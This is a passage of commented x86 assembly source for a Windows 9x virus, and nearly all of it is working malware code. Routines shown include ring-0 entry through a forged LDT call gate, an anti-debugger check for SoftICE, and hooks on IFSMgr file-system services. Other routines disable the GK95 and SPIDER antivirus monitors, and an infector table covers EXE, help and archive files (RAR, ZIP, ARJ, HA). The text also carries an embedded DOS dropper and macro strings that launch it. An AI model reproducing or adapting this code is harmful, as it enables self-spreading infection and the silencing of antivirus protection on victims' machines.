        LEA     EDI,[ESI+ECX+1]
        POP     ESI
        JB      SKIP_EXE_HA
        MOV     AL,2
        STOSW                                   ; machine-info length 2 + host system byte
        LEA     EDI,OUR_HA_FHEADER[EDX]
        ADD     ECX,SIZE HA_FILE_HEADER+3
        MOV     OUR_HA_FH_LEN[EDX],ECX
        MOV     AL,HA_STORED
        STOSB
        MOV     EAX,4 PTR [ESI.HA_FILE_TIME]
        XOR     AL,AL                           ; zero time low byte = infection marker
        MOV     4 PTR [EDI.HA_FILE_TIME-1],EAX
SKIP_EXE_HA:
        POP     EAX
        ADD     EAX,[ESI.HA_COMPRESS_SIZE]      ; advance past header + data
        JMP     READ_HA_FH
HA_DONE:
        CALL    CHECK_ARCOUNT                   ; EAX = dropper CRC32, ECX = dropper length
        JB      EXIT_HA
        PUSH    ESI ECX
        LEA     ESI,OUR_HA_FHEADER[EDX]
        MOV     [ESI.HA_COMPRESS_SIZE],ECX
        MOV     [ESI.HA_ORIGINAL_SIZE],ECX
        MOV     [ESI.HA_CRC32],EAX
        MOV     ECX,12345678H
        GOFF    OUR_HA_FH_LEN,4                 ; immediate patched with the header length
        CALL    ZIP1_INSERT_FILE
        POP     ECX ESI
        JB      EXIT_HA
        CALL    ZIP1_INSERT_FILE
        LEA     ESI,HEADER[EDX]
        PUSH    4
        POP     ECX
        JNB     SET_WRITE_FILE                  ; write back the 4-byte main header (new file count)
EXIT_HA:
        RETN
;------------------------------------------------
; GET_WININIT / CONCAT_WINDIR - build "<windir>\<name>" in TMP_PATH.
; SYS_PATH (found at TMP_PATH-SYS_PATH_DELTA) holds the pointer stored by
; MAKE_INSTALL from Get_Config_Directory.  COPY_SYS_PATH copies one byte
; before it tests the next, so it assumes SYS_PATH is non-empty.  The
; contract comment says CL includes the terminator, but GET_WININIT passes
; LEN_WININIT_INI (11, no NUL); the terminator is supplied by MOV [EDI],CL
; (CL = 0 after REP MOVSB) in either case.
GET_WININIT:
        LEA     ESI,WININIT_INI[EDX]
        MOV     CL,LEN_WININIT_INI
;ENTRY: ESI=&FILENAME,CL=STRLEN(ESI)+1
;EXIT: ESI=&FULLNAME
CONCAT_WINDIR:
        MOVZX   ECX,CL
        LEA     EDI,TMP_PATH[EDX]
        PUSH    EDI ESI
        MOV     ESI,[EDI-SYS_PATH_DELTA]        ; ESI = SYS_PATH
COPY_SYS_PATH:
        MOVSB
        CMP     DL,[ESI]                        ; DL == 0: stop at the terminator
        JNE     COPY_SYS_PATH
        POP     ESI
        REP     MOVSB                           ; append the file name
        MOV     [EDI],CL                        ; NUL terminate (CL is 0 here)
        POP     ESI
        RETN
;------------------------------------------------
;ENTRY: ON STACK - DWORD OF VXD
; VXD_CALL - generic VxD service call from ring 0.  Builds a 6-byte
; "INT 20H / DD service" dynamic-link thunk in the caller's ENTERD frame at
; [EBP-6] (the CD 20 bytes come from the ORG $-2 overlay of the MOV
; immediate), swaps its own return slot for the thunk address and RETs into
; it, so the thunk runs with the caller's return address on top of the stack.
; All service ids used in this file carry bit 15 (e.g. RING0_FILEIO =
; 408032H for IFSMgr service 32H), i.e. the VxDJmp form: VMM patches the
; thunk into JMP DWORD PTR [entry], the service returns straight to the
; caller, and the patched operand at [EBP-4] is later read back by
; MAKE_INSTALL.  Requirements: EBP = frame made with ENTERD STACK_FRAME,0
; (LEAVED also discards any stack arguments pushed for the service),
; and the ring-0 stack must be executable.  CLI_VXD_CALL re-disables
; interrupts before each call.
        GOFF    CLI_VXD_CALL
        CLI
        GOFF    OFF_VXD_CALL
VXD_CALL PROC
        PUSH    EAX
        LEA     EAX,[EBP-6]
        MOV     2 PTR [EAX],1234H               ; writes CD 20 (INT 20H) at [EBP-6]
        ORG     $-2
        INT     20H
        XCHG    EAX,[ESP+4]                     ; return slot <- &thunk, EAX <- caller's return address
        XCHG    EAX,[ESP+8]                     ; service slot <- return address, EAX <- service id
        MOV     [EBP-4],EAX                     ; service id dword follows the INT 20H
        POP     EAX
        RET                                     ; enter the thunk
ENDP
;------------------------------------------------
; IFSMgr_Ring0_FileIO wrappers.  Each sets up the register interface and
; jumps to FILE_IO.  Note OPEN_FILE_RO opens with
; OPEN_ACCESS_RO_NOMODLASTACCESS so reading files for infection leaves the
; last-access time untouched.  The "CMP EAX,12345678H / ORG $-4" pairs are
; the usual 4-byte skip: the next instruction(s) become the CMP immediate.
OPEN_CREATE:
        XOR     ECX,ECX
        PUSH    ACTION_CREATEALWAYS
        POP     EDX
        MOV     BX,OPEN_FLAGS_COMMIT OR OPEN_FLAGS_NOCRITERR OR \
                ACCESS_WRITEONLY OR OPEN_SHARE_DENYREADWRITE
        JMP     GO_OPEN_CREATE
OPEN_FILE_RO:
        MOV     BL,OPEN_ACCESS_RO_NOMODLASTACCESS OR OPEN_SHARE_DENYWRITE ;BL=METHOD
OPEN_FILE:
        XOR     EDX,EDX
        INC     EDX                             ;FILE_OPEN
        MOV     BH,OPEN_FLAGS_NOCRITERR SHR 8
GO_OPEN_CREATE:
        MOV     AX,R0_OPENCREATFILE
        JMP     FILE_IO
;------------------------------------------------
GET_ATTRIBUTES:
        MOV     AL,FGET_ATTRIBUTES
        CMP     EAX,12345678H                   ; skips XOR ECX,ECX / MOV AL,FSET_ATTRIBUTES
        ORG     $-4
;------------------------------------------------
CLR_ATTRIBUTES:
        XOR     ECX,ECX
SET_ATTRIBUTES:
        MOV     AL,FSET_ATTRIBUTES
;------------------------------------------------
MAN_ATTRIBUTES:
        MOV     AH,R0_FILEATTRIBUTES SHR 8
        CMP     EAX,12345678H                   ; skips MOV AX,R0_CLOSEFILE
        ORG     $-4
;------------------------------------------------
CLOSE_FILE:
        MOV     AX,R0_CLOSEFILE
;------------------------------------------------
FILE_IO:
        MOVZX   EAX,AX
        PUSH    RING0_FILEIO
GO_VXD_CALL:
        CALL    VXD_CALL
        RETN
;------------------------------------------------
DELETE_FILE:
        MOV     CL,27H                          ;ALL ATTRIBUTES  - also removes read-only/hidden/system files
        MOV     AX,R0_DELETEFILE
        JMP     FILE_IO
;------------------------------------------------
GET_SYS_TIME:
        PUSH    GET_SYSTEM_TIME
        JMP     GO_VXD_CALL
;------------------------------------------------
GETSIZE_FILE:
        MOV     AX,R0_GETFILESIZE
        JMP     FILE_IO
;------------------------------------------------
; IAPI_HOOKER - replacement for IFSMgr's InstallFileSystemApiHook service;
; MAKE_INSTALL overwrote the service-table entry with this address, so every
; VxD that installs a file-system API hook passes through here.
; Frame after PUSHAD/ENTERD: [EBP+4+n*4] = pushed registers (n=7 -> EAX),
; [EBP+4+8*4] = return address into the caller, +4 = its first parameter.
; If the caller is one of the AV VxDs recognised by TEST_VXD, nothing is
; installed and the caller gets back our saved "previous hook" pointer, so
; its hook silently never enters the chain.  Otherwise our own hook is
; removed, the caller's hook installed, and ours re-installed, keeping this
; code first in the chain.  EDI = code base after TEST_VXD.
IAPI_HOOKER PROC
        GOFF    OFF_IAPI_HOOKER
        BREAK
        PUSHAD
        ENTERD  STACK_FRAME,0                   ;FOR VXD_CALL
        CALL    CALC_DELTA
        PUSH    4 PTR OLD_IFS_HOOKER[EDX]
        POP     4 PTR [EBP+4+7*4]               ;EAX  - preset return value
        CALL    TEST_VXD
        JE      IAPI_EXIT                       ; recognised AV VxD: install nothing
        LEA     EAX,OFF_IFS_HOOKER[EDI]
        PUSH    EAX
        CALL    4 PTR OLD_RAPI_HOOKER[EDI]      ;REMOVE OUR API HOOKER
        PUSH    4 PTR [EBP+4+8*4+4]             ;1ST PARAMETER
        MOV     ESI,12345678H
        GOFF    OLD_IAPI_HOOKER,4               ; immediate patched with the original service address
        CALL    ESI                             ;INSTALL NEW API HOOKER
        MOV     [EBP+4+7*4],EAX                 ;EAX
        POP     EAX
        CALL    ESI                             ;REINSTALL OUR API HOOKER
        MOV     OLD_IFS_HOOKER[EDI],EAX
IAPI_EXIT:
        LEAVED
        POPAD
        RET
ENDP
;------------------------------------------------
; RAPI_HOOKER - hook on RemoveFileSystemApiHook (installed with
; Hook_Device_Service in MAKE_INSTALL).  When the caller is a recognised AV
; VxD its return address is redirected to the RAPI_RET_ADDRESS stub, which
; makes the service appear to return EAX = 0.  The original service is then
; reached by the PUSH/RET tail in every case.  The stub's PUSH immediate is a
; single shared slot written at run time - not reentrant across callers.
RAPI_HOOKER PROC
        GOFF    OFF_RAPI_HOOKER
        BREAK
        PUSHAD
        ENTERD  STACK_FRAME,0                   ;FOR VXD_CALL
        CALL    CALC_DELTA
        CALL    TEST_VXD                        ; EDX = caller's return address on exit
        JNE     RAPI_EXIT
        LEA     EAX,RAPI_RET_ADDRESS[EDI]
        MOV     [EAX+1],EDX                     ;STORE ORIGINAL RETURN ADDRESS
        MOV     [EBP+4+8*4],EAX                 ;RETURN ADDRESS
RAPI_EXIT:
        LEAVED
        POPAD
        PUSH    12345678H
        GOFF    OLD_RAPI_HOOKER,4               ; patched with the previous handler from Hook_Device_Service
        RET                                     ; tail-jump to the original service
        GOFF    RAPI_RET_ADDRESS
        PUSH    12345678H                       ;+1 ORIGINAL RETURN ADDRESS
        XOR     EAX,EAX
        RET
ENDP
;------------------------------------------------
; TEST_VXD / TEST_VXD_HOOK - identify the VxD that owns a code address.
; ENTRY (TEST_VXD): [EBP+4+8*4] = return address of the hooked call, EDX = code base
; ENTRY (TEST_VXD_HOOK): EAX = address to check, EDI = code base
; EXIT: ZF=1 if the owning VxD's name starts with "GK95" or "SPID"
;       (the dword constants are byte-reversed), EDI = code base,
;       EDX = checked address, ESI = &VXD_NAME, EAX = service return value.
; The two stack arguments are popped back rather than discarded.
; Only these two names are recognised: any other file-system monitor is
; unaffected by the hooks above and by SCAN_CHAIN below.
TEST_VXD:
        MOV     EAX,[EBP+4+8*4]                 ;RETURN ADDRESS
        MOV     EDI,EDX
TEST_VXD_HOOK:
        LEA     ESI,VXD_NAME[EDI]               ;EAX = CHECKING ADDRESS
        PUSH    ESI EAX
        PUSH    _GETVXDNAME
        CALL    VXD_CALL
        POP     EDX ECX
VXDCMP_ONLY:
        CMP     4 PTR [ESI],'59KG'              ;GK95?
        JE      IS_AVXD
        CMP     4 PTR [ESI],'DIPS'              ;SPIDER?
IS_AVXD:
        RETN
;------------------------------------------------
; IO_CALLBACK - handler registered with Install_IO_Handler for port
; OUR_PORT.  A byte IN from that port (ECX = BYTE_INPUT = 0) traps here and
; receives WE_HERE; that is the "already resident" probe used by SET_SEH.
IO_CALLBACK PROC
;ENTRY: ECX - IN(OUT)PUT TYPE (IGNORE OTHER DATA STRUC)
;EXIT: EAX - PORT DATA
        GOFF    OFF_IO_CALLBACK
        BREAK
        AND     ECX,ECX                         ;BYTE_INPUT?
        JNE     IS_NO_ME
        MOV     AL,WE_HERE                      ;WE'RE HERE!
IS_NO_ME:
        RET
ENDP
;------------------------------------------------
GET_RANDOM_MSK:
        MOV     AL,'Z'-'A'-14                   ; AL = 11 -> value in 0..10
;------------------------------------------------
GET_RANDOM_BYTE:
        MOVZX   EAX,AL
;------------------------------------------------
;ENTRY: EAX=(LIMIT-1) OR EAX=0 IF INFINITY,EDX=CODE DELTA IN MEMORY
;EXIT: EAX=RANDOM VALUE, ZF=1 IF ZERO
; 32-bit LCG: seed = seed*3A7FDH + 269EC3H, kept in the RANDOMIZE immediate
; (self-modifying, one global seed, initialised from Get_Date_And_Time in
; MAKE_INSTALL).  With EAX != 0 the result is the high dword of seed*EAX,
; i.e. 0..EAX-1.  Not a CSPRNG - used only for names and coin flips.
GET_RANDOM PROC
        PUSH    EDX EAX EDX
        MOV     EAX,12345678H
        GOFF    RANDOMIZE,4
        MOV     EDX,3A7FDH
        MUL     EDX
        POP     EDX                             ; EDX = code delta
        ADD     EAX,269EC3H
        MOV     4 PTR RANDOMIZE[EDX],EAX        ; store the new seed
        POP     EDX                             ; EDX = limit
        AND     EDX,EDX
        JE      NO_LIMIT
        MUL     EDX
        XCHG    EAX,EDX                         ; EAX = (seed*limit) >> 32
NO_LIMIT:
        AND     EAX,EAX                         ; ZF for the caller
        POP     EDX
        RET
ENDP
;------------------------------------------------
; FIND_FREE_SEL - scan the LDT for an unused (all-zero) 8-byte descriptor.
; ENTRY: EBX=0, EDI=current slot, ESI=LDT linear address, ECX=end of LDT
; EXIT:  CF=0, EAX=selector (offset | TI=1 | RPL=3), EDI=&slot;
;        CF=1 when no free slot is found before ECX.
; NO_FREE_SEL is also CALLed directly from SET_SEH to continue the scan
; after a hit.  "Free" means all-zero only; nothing reserves the slot, so a
; concurrent allocation by the system could collide (assumption, not
; guarded here).
FIND_FREE_SEL PROC
        CMP     EBX,[EDI]                       ;EBX=0,EDI=LDT CUR POS
        JNE     NO_FREE_SEL
        CMP     EBX,[EDI+4]
        JE      FREE_SEL
NO_FREE_SEL:
        SCASD                                   ; EDI += 8 (flags only, EAX untouched)
        SCASD
        CMP     EDI,ECX
        JB      FIND_FREE_SEL
        STC
        RET
FREE_SEL:
        MOV     EAX,EDI
        SUB     EAX,ESI                         ;ESI=LDT LINEAR ADDRESS
        OR      AL,111B                         ;LDT/RPL=3
        RET
ENDP
;------------------------------------------------
; RING0_INSTALL - ring-0 entry, reached from SET_SEH through the call gate
; it builds in the LDT.  ENTRY: EDI = host entry point (INTRUD_OFF),
; EDX = code delta, AL = byte read from OUR_PORT in SET_SEH.
; The original LEN_LOADER host bytes are written back at EDI from ring 0
; first (the host's code section may not be writable from ring 3 - see the
; "KNOWN UNFIXED BUGS" note at the top of the file); installation follows
; unless the port probe said the code is already resident.  Far RET back.
        GOFF    PE_OFF_R0_INSTALL
RING0_INSTALL PROC FAR
        BREAK
        CLI
        LEA     ESI,OLD_PECODE[EDX]
        MOV     CL,LEN_LOADER
        REP     MOVSB
        CMP     AL,WE_HERE
        JNE     MAKE_INSTALL
        STI
        RET
;------------------------------------------------
; MAKE_INSTALL - make the code resident: abort if SoftICE is loaded,
; reserve+commit system pages, copy the body there, hook OUR_PORT, seed the
; PRNG, record %WINDIR%, hook IFSMgr's API-hook services and neutralise
; known AV hooks.  Interrupts stay disabled throughout; DS=ES=SS.
; Every service goes through CLI_VXD_CALL with the id pushed last; stack
; arguments are never popped - LEAVED discards them.
        GOFF    OFF_R0_INSTALL
MAKE_INSTALL:
        BREAK
        CLI
        PUSH    ES DS SS SS
        POP     DS ES
        ENTERD  STACK_FRAME,0
        CALL    CALC_DELTA
        MOV     ESI,EDX
        LEA     EDI,[ESI+CLI_VXD_CALL]
        MOV     EAX,WINICE_ID
        MOV     EBX,GET_DDB                     ;18146H
        PUSH    EBX
        CALL    EDI                             ; Get_DDB(WINICE_ID): ECX = DDB or 0
        AND     ECX,ECX
IFNDEF DEBUG
        JS      GO_ERROR                        ;TEST IF WINICE INSTALLED  - non-zero (high) DDB pointer -> abort
ENDIF
        MOV     BL,_PAGERESERVE AND 0FFH        ;1811DH
        PUSH    PR_FIXED LARGE TOTAL_PAGE_NUM PR_SYSTEM EBX
        CALL    EDI                             ;RESERVE MEMORY PAGES
        INC     EBX                             ;_PAGECOMMIT=1811EH
        AND     AL,AL                           ; -1 return (failure) has AL sign set
GO_ERROR:
        JS      ERROR
        XCHG    EAX,EBX                         ; EAX = _PageCommit id, EBX = linear address
        XCHG    EDI,EBX                         ; EDI = linear address, EBX = &CLI_VXD_CALL
        CDQ                                     ; EDX = 0 (pager data)
        PUSH    PC_WRITEABLE OR PC_FIXED EDX PD_FIXEDZERO LARGE TOTAL_PAGE_NUM
        SHLD    EDX,EDI,20                      ; EDX = page number of the reserved region
        PUSH    EDX EAX
        CALL    EBX                             ;COMMIT RESERVED MEMORY PAGES
        CMP     EAX,1
        JB      GO_FREE_PAGE
        PUSH    EDI
        MOV     ECX,OUR_LEN
        REP     MOVSB                           ; copy the whole body (with its patched immediates) into the new pages
        POP     EDI
        LEA     ESI,[EDI+OFF_IO_CALLBACK]
        MOV     EDX,OUR_PORT
        PUSH    INSTALL_IO_HANDLER
        CALL    EBX                             ;HOOK PORT
GO_FREE_PAGE:
        JB      FREE_PAGE
        MOV     EDX,EDI                         ; from here EDX = EDI = base of the resident copy
        CALL    SET_TIME                        ;INIT FIRST INF_TIME
        PUSH    GET_DATE_AND_TIME
        CALL    EBX
        ADD     RANDOMIZE[EDI],EAX              ;INIT RANDOMIZE
        PUSH    GET_CONFIG_DIRECTORY
        CALL    EBX                             ;STORE &%WINDIR%
        MOV     SYS_PATH[EDI],EDX
        LEA     EAX,OFF_IFS_HOOKER[EDI]
        PUSH    EAX INSTALLAPIHOOK
        CALL    EBX                             ;HOOK FILESYSTEMAPI
        MOV     OLD_IFS_HOOKER[EDI],EAX         ; EAX = pointer to the previous hook
        MOV     ECX,[EBP-4]                     ; patched thunk operand = &service-table entry (see VXD_CALL)
        LEA     EDX,OFF_IAPI_HOOKER[EDI]
        XCHG    EDX,[ECX]                       ;HOOK INSTALLFILESYSTEMAPIHOOK  - table entry overwritten directly
        MOV     OLD_IAPI_HOOKER[EDI],EDX
; SCAN_CHAIN: walk the hook chain from the pointer just returned, asking VMM
; which VxD owns each hook function.  A hook owned by a recognised AV VxD has
; its first bytes overwritten with JMP DWORD PTR [next hook], so its
; monitoring code is bypassed.  Stops at IFSMgr's own entry or when no
; VxD name comes back.  The exact chain-cell layout ([EDX] = function,
; [EDX+4]+4 = next pointer) is implied by the code, not documented here.
SCAN_CHAIN:
        PUSH    EAX
        MOV     EAX,[EAX]
        CALL    TEST_VXD_HOOK
        POP     EDX
        XCHG    EAX,ECX
        JECXZ   NO_VXD_MEM
        MOV     EAX,[EDX+4]
        LEA     EAX,[EAX+4]
        JNE     NO_AV_HOOKER                    ; ZF still from TEST_VXD_HOOK
        MOV     ECX,[EDX]
        MOV     2 PTR [ECX],1234H               ;DISABLE AV FILE MONITORING
        ORG     $-2
        JMP     4 PTR DS:[12345678H]            ; immediate becomes FF 25 (JMP DWORD PTR [mem])
        ORG     $-4
        MOV     [ECX+2],EAX                     ; ... with EAX as its operand
NO_AV_HOOKER:
        CMP     4 PTR [ESI],'MSFI'              ;IFSMGR?
        JNE     SCAN_CHAIN
NO_VXD_MEM:
        LEA     ESI,OFF_RAPI_HOOKER[EDI]
        MOV     EAX,REMOVEAPIHOOK AND 0FFFF7FFFH ; strip the VxDJmp bit for Hook_Device_Service
        PUSH    HOOK_DEVICE_SERVICE
        CALL    EBX                             ;HOOK REMOVEFILESYSTEMAPIHOOK
        MOV     OLD_RAPI_HOOKER[EDI],ESI        ; previous handler -> RAPI_HOOKER's PUSH/RET tail
        JMP     ERROR
FREE_PAGE:
        PUSH    0 EDI _PAGEFREE
        CALL    EBX
ERROR:
        LEAVED
        POP     DS ES
        STI
        RET
ENDP
;------------------------------------------------
;INIT DATA AREA
; Initialised data.  CHK_NT/RR/DROP/SLEEP/EXEC_* are WinHelp macro fragments
; (CHK_NT tests that C:\NTLDR is absent before running the dropper);
; RUN_DROPPER is a small encoded stub (names suggest uuencoding) and
; RDROP_CON the raw DOSDROP.COM image.  The 1234H words are patched at run
; time (FIRST/SECOND_DROP_MASK).  Byte tables reproduced verbatim.
        GOFF    CHK_NT
RELO_CHK_NT     DB "IF(NOT(FE(`C:\\"
IFNDEF DEBUG
        DB      "NTLDR"
ELSE
        DB      "NTLD_"
ENDIF
        DB      ".')),`"
LEN_CHK_NT      = $-RELO_CHK_NT
        GOFF    RR_MACRO
        DB      'RR("KERNEL32","Sleep","U")',"')",0
        GOFF    DROP_MACRO
        DB      "EF(`COMMAND.COM',",'"/CECHO ',0
        GOFF    SLEEP_MACRO
        DB      "Sleep(550)')",0
        GOFF    EXEC_MACRO_1
        DB      "EF(`",0
EXEC_2          DB "',qchPath,0)')"
LEN_EXEC_2      = $-EXEC_2
;DOSDROP.COM START
        GOFF    RUN_DROPPER
RUN_DROPPER_LB  DB 58H,2CH,53H,50H,5EH,6AH,21H,5BH,68H,51H,40H,58H,28H,40H,6CH,28H,40H,6DH
        DB      30H,40H,6EH,28H,40H,70H,28H,40H,73H,28H,40H,76H,28H,40H,76H,28H,40H,7DH
        DB      50H,5FH,2CH,31H,6CH,6AH,44H,58H,34H,40H,50H,59H,68H
UU_MASK         = $-RUN_DROPPER_LB
        DW      'AA'
        DB      58H,56H,5FH,29H,40H,7EH,72H,5EH,23H,31H,7FH,24H,40H,7EH,50H,70H,7EH,31H
        DB      41H,7EH,47H,46H,46H,79H,3BH
LEN_UUD         = $-RUN_DROPPER_LB
        GOFF    RDROP_CON
RDROP_CON_LB    DB 0BEH,80H,0,0ACH,98H,93H,88H,38H,0ACH,3CH,20H,74H,0FBH,4EH,0BBH,24H,20H
        DB      0BAH,1,0,0E8H,6FH,0,0B1H,10H,0E8H,63H,0,8BH,54H,26H,8BH,4CH,28H,0B8H,0
        DB      42H,50H,0CDH,21H,59H,0E8H,53H,0,50H,91H,8BH,0FAH,0B8H
        GOFF    FIRST_DROP_MASK
OFF_MASK1       DW 1234H
        DB      31H,5,5
        GOFF    SECOND_DROP_MASK
RELO_MASK2      = $-OFF_MASK1
        DW      1234H
        DB      47H,0E2H,0F8H,0B4H,3EH,0CDH,21H,0BBH,11H,60H,0BAH,12H,0,0E8H,3EH,0,59H
        DB      0B4H,40H,0E8H,33H,0,0B4H,3EH,0CDH,21H,0BCH,9,4,0B3H,41H,0B4H,4AH,0CDH
        DB      21H,0BBH,0EBH,1,8CH,4FH,4,8CH,4FH,8,8CH,4FH,0CH,0B8H,0,4BH,56H,0E8H,0CH
        DB      0,0EH,17H,0BCH,7,4,0EH,1FH,5EH,6AH,0,0B4H,41H,8BH,0D6H,0CDH,21H,0C3H
        DB      0B4H,3FH,0BAH,0F9H,1,0EBH,0F6H,0F9H,0B8H,6CH,71H,0CDH,21H,0BEH,0DFH,1
        DB      72H,0E5H,93H,0C3H
        DB      'C:\'
        GOFF    RDROP_NAME
        DB      'ABCDE.COM'
        DB      0,0,80H,0,0,0,5CH,0,0,0,6CH,0
LEN_RDROP_CON   = $-RDROP_CON_LB
;DOSDROP.COM END
        GOFF    INF_PROCS                       ; per-file-type infector table (index = FILE_TYPE order)
        DW      INF_EXE
        DW      INF_HLP
        DW      INF_RAR
        DW      INF_ZIP
        DW      INF_ARJ
        DW      INF_HA
        GOFF    COMMAND_PIF
C_PIF_RELO      DB 'command.pif'
LEN_COMMAND_PIF = $-C_PIF_RELO
        GOFF    WININIT_INI
W_INI_RELO      DB 'wininit.ini'                ; 11 bytes, no terminator (see CONCAT_WINDIR)
LEN_WININIT_INI = $-W_INI_RELO
        GOFF    SYSTEM_INI
S_INI_RELO      DB 'system.ini'
LEN_SYSTEM_INI  = $-S_INI_RELO
;------------------------------------------------
;ENTRY POINT HERE FOR PE-FILES
; PE_INSTALL_POP - entry used when a decryptor precedes the body: turns the
; decryptor's CALL return address into the body's load address.  The
; [ESP+INTRUD_OFF] arithmetic depends on the decryptor's stack layout, which
; is not visible in this chunk.
        GOFF    PE_INSTALL_POP
        SUB     4 PTR [ESP],1234H               ;FOR CALL
        GOFF    ENCRYPTOR_LEN,4
        POP     4 PTR [ESP+INTRUD_OFF]
; PE_INSTALL - ring-3 entry in an infected PE.  Saves flags/registers,
; installs PROCESS_SEH as structured exception handler and runs SET_SEH,
; which does the LDT / call-gate work.  Every failure path - including any
; exception in ring 3 - lands in EXIT, which restores the host's original
; entry bytes (when the section is writable from ring 3) and transfers to
; the host, so the host still runs where installation is impossible.
        GOFF    PE_INSTALL
GATE_ADDR       = 6 PTR [EBP-6]                 ; 48-bit far pointer (offset:selector) for the gate call
        ENTERD  6,0                             ;FOR JMP
        PUSHFD
        PUSHAD
        CLD
        CALL    SET_SEH                         ; pushes &PROCESS_SEH = the SEH handler address
PROCESS_SEH:
        POP     ECX ECX ESP                     ;ESTABLISHERFRAME (+8)  - exception path: ESP <- our SEH record
EXIT:
        XOR     ECX,ECX
        POP     4 PTR FS:[ECX]                  ;REMOVE OUR EXCEPTION HANDLER
        POP     EBX                             ; EBX = &PROCESS_SEH, base for the *_LOCAL_RELO offsets
        CMP     CL,[EBX+RW_LOCAL_RELO]          ; RW_OR_RO byte: 0 = host code not writable here
        JE      NO_REST_HOST
        MOV     CL,LEN_LOADER
        MOV     EDI,[EBX+IOFF_LOCAL_RELO]       ; host entry point (INTRUD_OFF immediate)
        LEA     ESI,[EBX+ECX+OLDP_LOCAL_RELO-LEN_LOADER]   ; = OLD_PECODE
        REP     MOVSB                           ; put the original host bytes back from ring 3
NO_REST_HOST:
        POPAD
        POPFD
        LEAVED
        GOFF    RESTORE_REGS
        DB      LEN_FILL_RESTORE DUP (90H)      ;(MOV DREG,[ESP+XXXXXXXX])[4]  - NOP sled patched by the generator
        PUSH    12345678H
        GOFF    INTRUD_OFF,4                    ; patched with the host's original entry point
IOFF_LOCAL_RELO = $-PROCESS_SEH-4
        RET     1234H                           ; jump to host, discarding COUNT_RET bytes of stack
        GOFF    COUNT_RET,2
; SET_SEH - runs at ring 3.  Bails out (-> host) when there is no LDT or the
; port probe says we are resident and the host section is writable.  It then
; locates the LDT through SGDT/SLDT, finds two free descriptor slots and
; writes a DPL-3 call gate to RING0_INSTALL plus a flat ring-0 code segment
; into them with plain STOS writes - this only works where the LDT page is
; writable from ring 3; a fault here goes to PROCESS_SEH and the host runs.
; Both descriptors are zeroed again after the gate call.
SET_SEH:
        XOR     EBX,EBX
        PUSH    4 PTR FS:[EBX]
        MOV     FS:[EBX],ESP                    ;SET OUR EXCEPTION HANDLER  - record = [next][PROCESS_SEH]
        SLDT    CX
        JECXZ   EXIT                            ;NO LDT? (WIN NT)
        MOV     DX,OUR_PORT
        IN      AL,DX                           ; answered by IO_CALLBACK when resident
        CMP     AL,WE_HERE                      ;WE'RE ALREADY IN MEMORY?
        JE      $+2                             ;EXIT
        GOFF    RW_OR_RO,1                      ; displacement byte patched by the generator: 0 = fall through
RW_LOCAL_RELO   = $-PROCESS_SEH-1               ;   (read-only host, always go to ring 0), else jump to EXIT
RW_LOCAL_EXIT   = $-EXIT-1
        PUSH    EAX                             ; keep the port probe result for RING0_INSTALL
        SGDT    6 PTR [ESP-2]                   ;FIND LDT LINEAR ADDRESS  - GDTR limit at [ESP-2], base at [ESP]
        POP     ESI                             ; ESI = GDT linear base
        PUSH    EAX
        MOV     EDI,[ESI.ECX.1]                 ; LDT descriptor in the GDT (ECX = LDTR): bytes 1..4
        MOV     AL,[ESI.ECX.SEL_BASE_HIGH]
        MOV     CX,[ESI.ECX.SEL_LIMIT_LOW]
        SHRD    EDI,EAX,8                       ;GET LINEAR ADDRESS OF LDT
        MOV     ESI,EDI
        ADD     ECX,EDI                         ;GET LIMIT OF LDT  - end address (limit granularity not checked)
        CALL    FIND_FREE_SEL                   ; first free slot -> ring-0 code segment
GO_EXIT:
        JB      EXIT
        PUSH    EDI EAX                         ;FOR R0 CS
        CALL    NO_FREE_SEL                     ; second free slot -> call gate
        POP     EBX ESI ECX                     ; EBX = R0 CS selector, ESI = its slot, ECX = saved port probe
GO1_EXIT:
        JB      GO_EXIT
        MOV     2 PTR SS:GATE_ADDR+4,AX         ;AND FOR CALLGATE SELECTOR
        CALL    CALC_DELTA
        LEA     EAX,PE_OFF_R0_INSTALL[EDX]
        PUSH    EDI
        STOSW                                   ;MAKE CALLGATE DESCRIPTOR  - offset 15..0
        SHR     EAX,16
        MOV     [EDI+4],AX                      ; offset 31..16
        XCHG    EAX,EBX
        STOSD                                   ; selector = R0 CS, parameter count 0
        MOV     1 PTR [EDI-1],11101100B         ;P=1:DPL=3:S=0:TYPE=0CH (CALLGATE)  - callable from ring 3
        MOV     EDI,ESI                         ;MAKE R0 CS DESCRIPTOR
        PUSH    EDI
        MOV     AX,-1                           ;LIMIT=0FFFFH
        STOSD                                   ; limit 0FFFFH, base 15..0 = 0
        MOV     EAX,1100111110011010B SHL 8     ;G=1:32BIT:AVL=0:LIMIT=0FH
        STOSD                                   ;P=1:DPL=0:S=1:CODE:NONCONF:READ=1:NOACCESS  - flat 4G, DPL 0
        XCHG    EAX,ECX                         ; AL = port probe result again
        MOV     EDI,INTRUD_OFF[EDX]
        XOR     ECX,ECX
        MOV     CL,LEN_LOADER
        PUSH    EDI
_SCASB:
        SCASB                                   ;LOAD CODE PAGE(S) INTO MEMORY  - touch the host bytes before ring 0 runs with CLI
        LOOP    _SCASB
        POP     EDI
        CALL    GATE_ADDR                       ; far call through the gate -> RING0_INSTALL
        POP     EDI
        XOR     EAX,EAX
        STOSD                                   ; wipe the R0 CS descriptor ...
        STOSD
        POP     EDI
        STOSD                                   ; ... and the call gate
        STOSD
        STC
        JMP     GO1_EXIT                        ; always ends at EXIT -> host
        GOFF    OUR_LEN
INIT_PAGE_NUM   = (OUR_LEN+0FFFH)/1000H
;------------------------------------------------
;ZERO INITIALIZED DATA
; Uninitialised work area following the code in the resident pages.  The
; ORG AREA_COMMON_1 lines overlay the per-format header buffers on the same
; memory (one archive type is processed at a time).  The *_LOCAL_RELO and
; *_DELTA equates are fixed distances used by PROCESS_SEH and CONCAT_WINDIR;
; keep them in step with the layout.
        GOFF    ZERO_INIT
        GOFF    OLD_PECODE
OLDP_LOCAL_RELO = $-PROCESS_SEH
        DB      LEN_LOADER DUP (?)              ; original host bytes at the entry point
        GOFF    SHELL_FLAG
SHELL_FLAG_RELO DB ?
        GOFF    SYS_PATH
SYS_PATH_RELO   DD ?                            ; pointer from Get_Config_Directory (%WINDIR%)
        GOFF    FLAG
        DD      ?                               ;BIT 0 - REENTERING FLAG
SYS_PATH_DELTA  = $-SYS_PATH_RELO
SHELL_FLAG_DELTA= $-SHELL_FLAG_RELO
        GOFF    TMP_PATH
        DB      MAX_PATH DUP (?)
AREA_COMMON_1:
        GOFF    SYS_FILE_HEADER
        FILE_HEADER <>
        SYSTEM_HEADER <>
        GOFF    BUFF4MACRO
